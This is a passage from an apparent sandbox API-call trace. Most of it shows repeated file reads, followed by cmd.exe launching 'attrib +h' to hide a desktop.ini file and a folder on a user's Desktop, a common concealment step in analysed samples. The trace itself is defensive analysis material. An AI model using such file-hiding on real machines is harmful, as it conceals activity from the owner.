| out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.693] _close (_FileHandle=4) returned 0 [0134.693] FindNextFileW (in: hFindFile=0x20e6a8, lpFindFileData=0x1cef80 | out: lpFindFileData=0x1cef80) returned 0 [0134.694] GetLastError () returned 0x12 [0134.694] FindClose (in: hFindFile=0x20e6a8 | out: hFindFile=0x20e6a8) returned 1 [0134.694] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0134.696] _close (_FileHandle=3) returned 0 [0134.696] GetConsoleTitleW (in: lpConsoleTitle=0x1cf3b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.696] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0134.696] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0134.696] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.697] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0xffffffff [0134.697] GetLastError () returned 0x2 [0134.697] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0xffffffff [0134.697] GetLastError () returned 0x2 [0134.697] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0x20e6a8 [0134.697] FindClose (in: hFindFile=0x20e6a8 | out: hFindFile=0x20e6a8) returned 1 [0134.697] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0xffffffff [0134.697] GetLastError () returned 0x2 [0134.697] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0x20e6a8 [0134.697] FindClose (in: hFindFile=0x20e6a8 | out: hFindFile=0x20e6a8) returned 1 [0134.697] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0134.697] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0134.697] GetConsoleTitleW (in: lpConsoleTitle=0x1cf14c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.737] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cefd4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf09c | out: lpAttributeList=0x1cefd4, lpSize=0x1cf09c) returned 1 [0134.737] UpdateProcThreadAttribute (in: lpAttributeList=0x1cefd4, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf094, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cefd4, lpPreviousValue=0x0) returned 1 [0134.737] GetStartupInfoW (in: lpStartupInfo=0x1cef90 | out: lpStartupInfo=0x1cef90*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0134.738] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0134.738] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf030*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf07c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" ", lpProcessInformation=0x1cf07c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xc30, dwThreadId=0xc34)) returned 1 [0134.739] CloseHandle (hObject=0x50) returned 1 [0134.739] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0134.739] GetEnvironmentStringsW () returned 0x212dc0* [0134.739] FreeEnvironmentStringsW (penv=0x212dc0) returned 1 [0134.739] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0134.822] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1cef70 | out: lpExitCode=0x1cef70*=0x0) returned 1 [0134.822] CloseHandle (hObject=0x4c) returned 1 [0134.823] _vsnwprintf (in: _Buffer=0x1cf0b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cef7c | out: _Buffer="00000000") returned 8 [0134.823] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0134.823] GetEnvironmentStringsW () returned 0x212dc0* [0134.823] FreeEnvironmentStringsW (penv=0x212dc0) returned 1 [0134.823] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0134.823] GetEnvironmentStringsW () returned 0x212dc0* [0134.823] FreeEnvironmentStringsW (penv=0x212dc0) returned 1 [0134.823] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cefd4 | out: lpAttributeList=0x1cefd4) [0134.823] GetConsoleTitleW (in: lpConsoleTitle=0x1cf3b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.823] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0134.823] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0134.824] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.824] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0xffffffff [0134.824] GetLastError () returned 0x2 [0134.824] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0xffffffff [0134.824] GetLastError () returned 0x2 [0134.824] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0x20e6a8 [0134.824] FindClose (in: hFindFile=0x20e6a8 | out: hFindFile=0x20e6a8) returned 1 [0134.825] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0xffffffff [0134.825] GetLastError () returned 0x2 [0134.825] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0x20e6a8 [0134.825] FindClose (in: hFindFile=0x20e6a8 | out: hFindFile=0x20e6a8) returned 1 [0134.825] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0134.825] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0134.825] GetConsoleTitleW (in: lpConsoleTitle=0x1cf14c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.825] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cefd4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf09c | out: lpAttributeList=0x1cefd4, lpSize=0x1cf09c) returned 1 [0134.825] UpdateProcThreadAttribute (in: lpAttributeList=0x1cefd4, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf094, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cefd4, lpPreviousValue=0x0) returned 1 [0134.825] GetStartupInfoW (in: lpStartupInfo=0x1cef90 | out: lpStartupInfo=0x1cef90*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0134.825] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0134.825] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf030*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf07c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"", lpProcessInformation=0x1cf07c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc00, dwThreadId=0xbfc)) returned 1 [0134.827] CloseHandle (hObject=0x4c) returned 1 [0134.827] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0134.827] GetEnvironmentStringsW () returned 0x2137f8* [0134.827] FreeEnvironmentStringsW (penv=0x2137f8) returned 1 [0134.827] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0134.871] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cef70 | out: lpExitCode=0x1cef70*=0x0) returned 1 [0134.871] CloseHandle (hObject=0x50) returned 1 [0134.871] _vsnwprintf (in: _Buffer=0x1cf0b8, 